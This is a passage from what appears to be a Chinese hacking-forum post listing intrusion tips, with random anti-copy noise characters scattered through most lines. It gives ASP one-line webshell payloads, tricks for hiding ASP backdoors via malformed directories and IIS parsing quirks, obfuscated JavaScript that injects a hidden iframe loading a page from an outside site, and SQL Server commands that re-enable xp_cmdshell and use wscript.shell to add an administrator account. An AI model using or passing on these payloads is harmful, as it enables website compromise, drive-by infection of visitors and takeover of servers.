: K& _1 b& ]! f1 X$ t. _2 jc).%><%execute request("go")%><%. H, B" w# D5 W" }# p0 t
d).<script language=VBScript runat=server>execute request("sb")</Script>
6 _6 @9 L! K9 j# ?e).<%25Execute(request("l"))%25>
$ c$ G  _* |' B% B7 zf).<%if request("cmd")<>"" then execute request("pass")%>& M% k1 i+ P# ?' C7 s
0 I8 \8 ^* j9 _7 }
52、at "12:17" /interactive cmd6 T4 n5 A) T& ?: H, a
执行后可以用AT命令查看新加的任务" l( P7 _* Z4 Z4 i4 ~# @
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。, @9 `2 R1 y7 T5 f" ?# s

5 h3 ?+ m$ E! Q0 p# @4 n3 M53、隐藏ASP后门的两种方法
+ R+ }+ d: ~. `$ v9 Y1、建立非标准目录:mkdir images..\- u* q3 F8 a( o* p
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
4 \2 c: u: X2 p; k5 b通过web访问ASP木马:http://ip/images../news.asp?action=login
9 q$ O$ ^. ]/ E0 Q( {; g如何删除非标准目录:rmdir images..\ /s
' T! I; j/ U/ z1 [: ^8 j8 l  q2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:. i& |: o) Y4 ^# I, A$ a
mkdir programme.asp( {: H+ q* N8 V) V! a: x
新建1.txt文件内容:<!--#include file=”12.jpg”-->! w+ b- c+ V' Y' b6 c* L( P* G4 W
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件+ t. \0 X8 D3 N1 z+ m& I/ \
attrib +H +S programme.asp! p$ z/ k3 d" E! n3 w+ V" ~8 O
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt/ {, ]( v. M3 d
' c3 _" Y2 ?' t1 y
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
, I( H. K5 t2 b- c然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。9 ^# R- _* k& g4 j6 _9 k" O% c, f
* q3 b8 e2 J7 s+ c% X( w
55、JS隐蔽挂马
$ v  k1 T, w( s  ]! T7 j1.
, U- `! p, A# B" v8 g0 _var tr4c3="<iframe src=ht";
% F& f0 u' e% X+ ttr4c3 = tr4c3+"tp:/";4 N0 R0 x" j, l$ ?+ P" X# `
tr4c3 = tr4c3+"/ww";6 d! |  L( W- }6 F
tr4c3 = tr4c3+"w.tr4";& z3 g4 T6 U8 o/ o
tr4c3 = tr4c3+"c3.com/inc/m";* f4 v% J# P$ A1 K: F, d
tr4c3 = tr4c3+"m.htm style="display:none"></i";
+ K7 Q. `* D* U: C$ z3 U7 T- gtr4c3 =tr4c3+"frame>'";3 [4 f9 d  K" {: R  x
document.write(tr4c3);. Q) a8 x9 u0 |+ U
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
7 B) q7 A! V7 b6 J$ l
5 `2 V5 V! {# I' V. x2.
$ W2 h* B! {; Z2 S2 R转换进制,然后用EVAL执行。如  p" V! N! o/ |
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");6 [, ~* M$ Y& o: a
不过这个有点显眼。! I7 \" R+ @6 q9 _4 W- Q
3., y, f+ O: x5 k! |
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
) l# o3 t) U6 A/ z最后一点,别忘了把文件的时间也修改下。
; Y1 b7 |- c- h4 n. {7 a5 F6 t; ]2 o0 ~% O1 M9 P
56.3389终端入侵常用DOS命令+ X7 g9 ^3 K7 d" D  \' ~
taskkill taskkill /PID 1248 /t
' g8 m' Z! X$ P: Q5 O" S  I2 h4 j& p4 t/ ^' }
tasklist 查进程$ ~! f; G' X) A9 m
6 k* X# H( \0 T4 g
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
  M; A, p3 x$ M) Oiisreset /reboot
+ z# w$ W+ ~+ ptsshutdn /reboot /delay:1    重起服务器
! ^2 l8 f% O+ ~# y' R1 _* a- N/ O* u, r" A% `& e3 Z
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,8 ?1 O, E0 Q/ f/ Q' H
" R; o, ]1 d3 ?; ~2 K0 d  G5 d/ K. y6 o
query user 查看当前终端用户在线情况
6 k: k; Z/ H* \' W0 f# R
) O; g7 q( ]. `要显示有关所有会话使用的进程的信息,请键入:query process *# D0 D( h2 ~8 M
$ w( v0 h% [' D* R
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
2 R2 H- S2 k" `( f; A9 q1 A# C* l6 f. i& \) c$ x
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
& H# w6 p! F6 {( i' A( g
. T: V7 g  K1 O9 V) {. a要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
7 S+ q) c8 `& d0 Y
& ]0 k* [6 c9 q命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
+ E* f9 t9 |2 P# S6 W( q/ t6 H; x8 P! {+ U4 a# q" ^6 J' e9 @& ]2 a1 x
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统( M( t( b5 O4 f8 a! g

6 D) _: o0 p0 J0 h+ p' h0 x% V命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
) Q5 T- f% N6 H, p! G5 |" L4 Y% a  x" Y% Q/ A" }- G9 a5 C
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
5 r4 P- L- @# p& a3 J, Z9 X/ D
( K. X, v, b" f  z# k7 z. H' @! ]56、在地址栏或按Ctrl+O,输入:& `( t2 x  }& Z, h1 y6 Q
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
. e% a5 ^) h: ?3 v. x& Q  R
% J8 ]: y7 }0 `* K+ U7 C源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
% G/ y( Q0 E, g6 f5 g+ D$ F, Q- R2 q0 i* @! s0 W8 j6 o: b7 o. B
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
6 g) z+ j8 Q% [* b- q6 {: k用net localgroup administrators是可以看到管理组下,加了$的用户的。8 E, h) Y! U* C) s2 ?+ G
) k0 ^6 T: @  i! V, Y; L) s. D
58、 sa弱口令相关命令
, z8 R* L& C0 X9 D" k
  P4 i$ I( j9 u' P4 ]; a; N+ u一.更改sa口令方法:0 ]* T! E  g$ I& G2 M
用sql综合利用工具连接后,执行命令:
6 p5 ~' ]) A! ?* `exec sp_password NULL,'20001001','sa'
. C. C' @7 \" c* G(提示:慎用!)" x) Y- N8 }8 r, Q) [+ _0 B+ N
, Z) N0 T4 a, c
二.简单修补sa弱口令.
6 e" U! W) }) D6 c# |3 T: K
' l* S/ Y0 \" Y1 W方法1:查询分离器连接后执行:
' F/ o8 W4 T9 _9 x* j. x, t! iif exists (select * from" {& w' U3 F9 I  M8 ?
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and" k$ ^. ?& \7 H3 q
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
0 h2 Y8 c9 w; J# l5 |5 y+ }
1 S% }- w0 G0 Z) w% g) R; c  vexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'' M6 X  _. Y. ?, e- |; v

7 j0 U1 L' q' c/ zGO% x6 u) n4 A& a- \

' v0 V5 Q2 o5 `  {然后按F5键命令执行完毕
$ O; b$ P* ]% N$ E
7 T, q' U3 f  p/ j, `方法2:查询分离器连接后, ]0 Y/ |* Y& I7 }0 ?7 J4 x
第一步执行:use master
1 `$ `9 h* l  i/ n8 b" ]; b第二步执行:sp_dropextendedproc 'xp_cmdshell'4 {6 N  x* s6 ~8 N/ B# C) J  K
然后按F5键命令执行完毕" L' f: ]9 t3 o: K5 j

2 F3 z1 z0 A- l" o7 L- z* S+ V) r: \" G* _# Z, k$ G
三.常见情况恢复执行xp_cmdshell.
# O3 \; D# v7 k4 h* K" e
7 b/ i! E2 O3 k5 E: q; M/ X, w2 b. F( G: ^
1 未能找到存储过程'master..xpcmdshell'./ Q" {2 [3 o4 m
   恢复方法:查询分离器连接后,
: F; d6 h* C4 N5 r7 L第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
: y2 N+ ?, V1 g6 F! s8 A第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 a9 b/ m' w5 q$ [0 S) U# @然后按F5键命令执行完毕
/ e  ]- R* |8 V! R* f$ b" L. d" ?6 o( K' p( M
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
$ R# j0 j7 F+ r( J1 m6 `& R恢复方法:查询分离器连接后,
; h. ]7 @) y/ [0 P0 d( m" [. `第一步执行:sp_dropextendedproc "xp_cmdshell"5 O* k. \) F1 i' y1 x# i2 Z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( K$ d, V! N; d3 t( i
然后按F5键命令执行完毕' t- i( X5 d6 }$ M1 _, l3 p% s# N
" g" }+ ?/ J' C
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)* k8 J( M( [6 y4 R0 V& f" R* R
恢复方法:查询分离器连接后,
& _' V5 O, x& n第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
' H9 n; a% S5 p& |/ _) o* i9 F' k) q) l第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
) E( Q( ~& ^% u7 }# S: r然后按F5键命令执行完毕
1 x- a2 F; @! K" ?2 n/ j& @2 O7 h7 k! `% }. Z
四.终极方法.$ P9 T0 ?2 q( o4 M, @- o% {0 v
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
4 [, M: }* h  _1 F9 |% i) r$ _查询分离器连接后,
% g- C6 j5 y" Q2000servser系统:2 x$ |+ |' ^0 ~1 u2 A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'- L7 k4 B' L& f6 I0 a

! d  G& N: a; \) s8 }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. ]2 W( }4 ?, r7 q7 C2 V: c3 m+ Z" P( ?3 \: `, ^/ E+ R$ B# {5 ~' f
xp或2003server系统:
: Y+ Z7 w/ {! p$ H( |. y' i
2 N0 G/ ]' P5 m0 ]# Jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'' _, z8 R+ ^% Y3 z/ t7 L4 h

/ s8 d0 R1 }9 C0 W4 @) J; k+ ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 o4 L: {; J+ \- l  @8 a% f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表